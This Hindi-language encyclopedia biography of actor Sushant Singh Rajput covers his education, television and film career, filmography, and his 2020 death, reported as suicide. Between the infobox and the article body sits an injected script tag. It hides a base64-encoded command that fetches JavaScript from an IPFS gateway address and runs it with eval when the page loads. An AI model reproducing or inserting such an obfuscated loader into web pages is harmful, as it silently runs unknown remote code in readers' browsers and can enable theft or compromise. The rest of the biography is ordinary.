सुशांत सिंह राजपूत

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
सुशांत सिंह राजपूत
सुशांत सिंह राजपूत
पूरा नाम सुशांत सिंह राजपूत
जन्म 21 जनवरी, 1986
जन्म भूमि पटना, बिहार
मृत्यु 14 जून, 2020
मृत्यु स्थान मुम्बई, महाराष्ट्र
कर्म भूमि भारत
कर्म-क्षेत्र अभिनय
मुख्य फ़िल्में 'पवित्र रिश्ता', एम.एस. धोनी: द अनटोल्ड स्टोरी, 'काय पो चे', 'शुद्ध देसी रोमांस', 'डिटेक्टिव ब्योमकेश बक्शी', 'केदारनाथ' आदि।
प्रसिद्धि अभिनेता
नागरिकता भारतीय
अन्य जानकारी सुशांत सिंह राजपूत ने 2006 के काॅमनवेल्थ खेलों में भी परफाॅर्म किया था। इसके बाद 51वें फिल्मफेयर अवार्डस में भी वे बैकग्राउंड डासंर के तौर पर काम कर चुके थे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>सुशांत सिंह राजपूत (अंग्रेज़ी: Sushant Singh Rajput, जन्म- 21 जनवरी, 1986, पटना, बिहार; मृत्यु- 14 जून, 2020, मुम्बई, महाराष्ट्र) भारतीय फ़िल्म अभिनेता, थियेटर और टीवी कलाकार थे। उन्होंने सबसे पहले 'किस देश में है मेरा दिल' नामक धारावाहिक में काम किया, लेकिन उनको पहचान एकता कपूर के धारावाहिक 'पवित्र रिश्ता' से मिली। इसके बाद उन्हें फ़िल्मों के प्रस्ताव मिलना शुरू हुए। उनकी पहली फ़िल्म 'काय पो छे!' थी, जिसमें उनके अभिनय की काफी तारीफ़ भी हुई। 'काय पो छे' के बाद सुशांत सिंह राजपूत 'शुद्ध देसी रोमांस' में वाणी कपूर और परिणीति चोपड़ा के साथ दिखे। फ़िल्म सफल रही और सुशांत का फ़िल्मी कॅरियर परवान चढ़ गया।


2016 में आई प्रसिद्ध भारतीय क्रिकेटर महेंद्र सिंह धोनी की आत्मकथा 'एम एस धोनी: द अनटोल्ड स्टोरी' उनकी सबसे चर्चित फिल्मों में से एक थी। सुशांत सिंह राजपूत ने कुल 12 प्रसिद्ध फिल्मों और दो प्रसिद्ध टीवी धारावाहिकों में अभिनय किया। अपने व्यावसायिक जीवन के चरम वर्षों में, केवल 34 वर्ष की उम्र में सुशांत सिंह राजपूत का निधन हो गया। उन्हें मुंबई (बांद्रा) स्थित अपने घर में मृत पाया गया। प्राथमिक जानकारी के अनुसार संभावित है कि उन्होंने फांसी लगाकर आत्महत्या कर ली। उनके इस कदम का सटीक कारण स्पष्ट नहीं हो पाया है, परंतु प्राथमिक सूचना इस बात का संकेत देती है कि वे अपने जीवन के अंतिम छ: महीनों से अवसादग्रस्त थे।

जन्म

सुशांत सिंह राजपूत का जन्म 21 जनवरी, 1986 को पटना, बिहार में हुआ था। उनका पैतृक गाँव बिहार के पूर्णिया जिले का मालडीहा है। उनकी एक बहन का नाम रितु सिंह है जो कि राज्य स्तर की क्रिकेटर हैं। 2002 में उनकी माँ के देहांत के बाद वे टूट गए और उसी वर्ष वे अपने परिवार के साथ पटना से दिल्ली आ गए।

शिक्षा

सुशांत सिंह राजपूत ने अपनी शिक्षा पटना के सेंट करेन हाई स्कूल और नई दिल्ली के कुलाची हंसराज मॉडल स्कूल से प्राप्त की। उन्होंने ऑल इंडिया इंजीनियरिंग एंट्रेंस एग्जामिनेशन में 7वां स्थान प्राप्त किया था। दिल्ली टेक्नोलॉजिकल यूनिवर्सिटी में बैचलर ऑफ़ इंजीनियरिंग (मैकेनिकल इंजीनियरिंग) कक्षा में प्रवेश प्राप्त किया, जिसे पहले दिल्ली कॉलेज ऑफ़ इंजीनियरिंग के रूप में जाना जाता था। वे भौतिकी में एक राष्ट्रीय ओलंपियाड विजेता भी थे। उन्होंने कुल मिलाकर 11 इंजीनियरिंग प्रवेश परीक्षाओं को पास किया, जिनमें आईएसएम धनबाद भी शामिल है। हालांकि सुशांत सिंह राजपूतने एक्टिंग में कॅरियर बनाने के लिए ड्रापिंग से पहले केवल चार साल का कोर्स पूरा किया।

कॅरियर

सुशांत सिंह राजपूत के कॅरियर की शुरुआत बैकअप डांसर के रूप में हुई और उन्होंने फिल्मफेयर अवार्डस में भी कई बार डांस किया। वहीं पर उनको सबसे पहले बालाजी टेलीफिल्मस की कास्टिंग टीम ने नोटिस किया, जिसके बाद उनके कॅरियर की शुरुआत ‘किस देश में है मेरा दिल’ नामक सीरियल से हुई, जिसमें उन्होंने प्रीत जुनेजा का किरदार निभाया था; लेकिन जी.टी.वी. का शो ‘पवित्र रिश्ता’ उनके कॅरियर के लिए मील का पत्थर साबित हुआ। इसके बाद वे डांस रियलिटी शो ‘जरा नच के दिखा 2' और 'झलक दिखला जा 4' में भी दिखाई दिए और इसके बाद सुशांत ने फिल्मों का रूख कर लिया और ‘काय पो चे’ फिल्म से अपना फिल्मी सफर शुरू किया।

सुशांत सिंह राजपूत

टीवी धारावाहिक

  • 2008-2009 - किस देश में है मेरा दिल - प्रीत ललित जुनेजा के रूप में
  • 2009-2011 - पवित्र रिश्ता - मानव दामोदर देशमुख के रूप में
  • 2010-2010 - ज़रा नचके दिखा - (सीज़न 2) प्रतिभागी के रूप में
  • 2010-2011 - झलक दिखला जा 4 - प्रतिभागी के रूप में

मुख्य फ़िल्में

सुशांत सिंह राजपूत की प्रमुख फ़िल्में
क्र.सं. वर्ष फ़िल्म भूमिका
1. 2013 काय पो चे ईशान भट्ट
2. 2013 शुद्ध देसी रोमांस रघु राम
3. 2014 पी. के. सरफ़राज़ यूसुफ़
4. 2015 डिटेक्टिव ब्योमकेश बक्शी ब्योमकेश बक्शी
5. 2016 एम. एस. धोनी: द अनटोल्ड स्टोरी महेंद्र सिंह धोनी
6. 2017 राबता -
7. 2018 चंदा मामा दूर के -
8. 2018 केदारनाथ मन्सूर
9. 2019 सोनचिड़िया लखन सिंह 'लखना'
10. 2019 छिछोरे अनिरुद्ध सिंह 'अन्नी'
11. 2019 ड्राइव -
11. 2020 दिल बेचारा -

अन्य जानकारी

  • मशहूर कोरियोग्राफर श्यामक डावर के सुशांत सिंह राजपूत छात्र रहे। सुशांत ने 2006 के काॅमनवेल्थ खेलों में भी परफाॅर्म किया था। इसके बाद 51वें फिल्मफेयर अवार्डस में भी वे बैकग्राउंड डासंर के तौर पर काम कर चुके थे।
  • मुंबई आने के बाद उन्होंने एक डांस ग्रुप के साथ भी परफाॅर्म किया, जिसको मशहूर कोरियोग्राफर ऐश्ले लोबो ने प्रशिक्षित किया था। इसके बाद उन्होंने थियेटर ज्वाइन किया और शायद यही कारण है कि वे एक मेहनती अभिनेता बनने में सफल हुए।
  • उन्होंने मशहूर एक्शन डायरेक्टर अलन अमीन से मार्शल आर्ट्स के गुर भी सीखे।
  • मशहूर टी.वी सीरियल 'पवित्र रिश्ता' से पहले वे ‘किस देश में है मेरा दिल’ नामक सीरियल में काम कर चुके थे।
  • 'पवित्र रिश्ता' में निभाए गए अपने किरदार 'मानव देशमुख' से वे घर-घर की पसंद बन गए थे।
  • सुशांत सिंह राजपूत ‘जरा नच के दिखा 2’ और ‘झलक दिखला जा 4’ जैसे बड़े डांसिग शोज के भी प्रतिभागी रहे और ‘झलक दिखला जा 4’ के दौरान उन्हें ‘मोस्ट कंसिस्टेंट परफाॅर्मर’ का टाइटल भी मिला।
  • फिल्म ‘काय पो चे’ में निभाए गए अपने किरदार की प्रेरणा उन्हें अपनी बहन मीतू सिंह से मिली थी। मीतू सिंह राज्य स्तर की क्रिकेट खिलाड़ी हैं।
  • एक समय था, जब सुशांत सिंह राजपूत के साथ अभिनेत्रियां काम तक नहीं करना चाहती थीं, क्योंकि वे एक साधारण परिवार से थे और उनका कोई फिल्मी बैकग्राउंड नहीं था। फिल्म ‘शुद्ध देसी रोमांस’ इसका उदाहरण है। काफी समय बाद फिल्म के लिए परिणीति चोपड़ा को साइन किया गया था।
  • वे अपनी लव लाइफ को लेकर भी अखबारों और टी.वी. की सुर्खियों में रहे हैं। वे अपनी प्रेमिका अंकिता लोखंडे के साथ काफी लंबे वक्त से रिलेशन में रहे और खबरों की मानें तो वे एक साथ लिव-इन में भी रहे।
  • फिल्म ‘डिटेक्टिव ब्योमकेश बक्शी’ को लेकर भी सुशांत सिंह राजपूत ख़ासा सुर्खियों में रहे। डायरेक्टर दिबाकर बैनर्जी के अनुसार ब्योमकेश बक्शी के किरदार के लिए उनकी पहली पसंद सुशांत सिंह ही थे।
  • उन्‍‍‍‍‍‍‍‍होंने भारतीय किक्रेटर महेंद्र सिंह धोनी पर बनी बायोपिक में भी उनका किरदार निभाया।[1]

मृत्यु

सुशांत सिंह राजपूत को 14 जून 2020 को दिन में मुम्बई के बांद्रा में अपने घर में मृत पाया गया। प्राथमिक सूचना के अनुसार उनका निधन आत्महत्या के कारण हुआ। बताया जा रहा है कि सुशांत सिंह राजपूत पिछले 6 महीने से अवसाद में थे, जिसके कारण उन्होंने आत्महत्या कर ली।

इज़रायल ने बताया अपना सच्चा दोस्त

सुशांत सिंह राजपूत के निधन के बाद इज़रायल से उनके लिए ख़ास संदेश आया। इज़रायल ने सुशांत को अपना सबसे सच्चा दोस्त बताया। इज़रायल की तरफ से विदेश मंत्रालय के जनरल और डिप्टी डायरेक्टर गिलाड कोहेन ने उनकी याद में एक स्पेशल मैसेज शेयर किया। वह ट्वीट कर लिखते हैं- "मैं सुशांत सिंह राजपूत के निधन पर संवेदना व्यक्त करता हूं। वह इज़रायल के सच्चे दोस्त थे। आपकी बहुत याद आएगी।" जब सुशांत सिंह राजपूत इज़रायल आए थे, तब उन्होंने अपनी फिल्म 'ड्राइव' का एक गाना इज़रायल में शूट किया था। मखना गाने के वक्त ड्राइव की कास्ट इज़रायल में मौजूद थी। उसी गाने का लिंक भी इजरायल ने अपने ट्वीट में शेयर किया।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. सुशांत सिंह राजपूत की जीवनी (हिंदी) jivanihindi.com। अभिगमन तिथि: 17 जून, 2020।
  2. इजरायल ने किया सुशांत सिंह राजपूत को याद, बताया अपना सच्चा दोस्त (हिंदी) aajtak.intoday.in। अभिगमन तिथि: 17 जून, 2020।

बाहरी कड़ियाँ

संबंधित लेख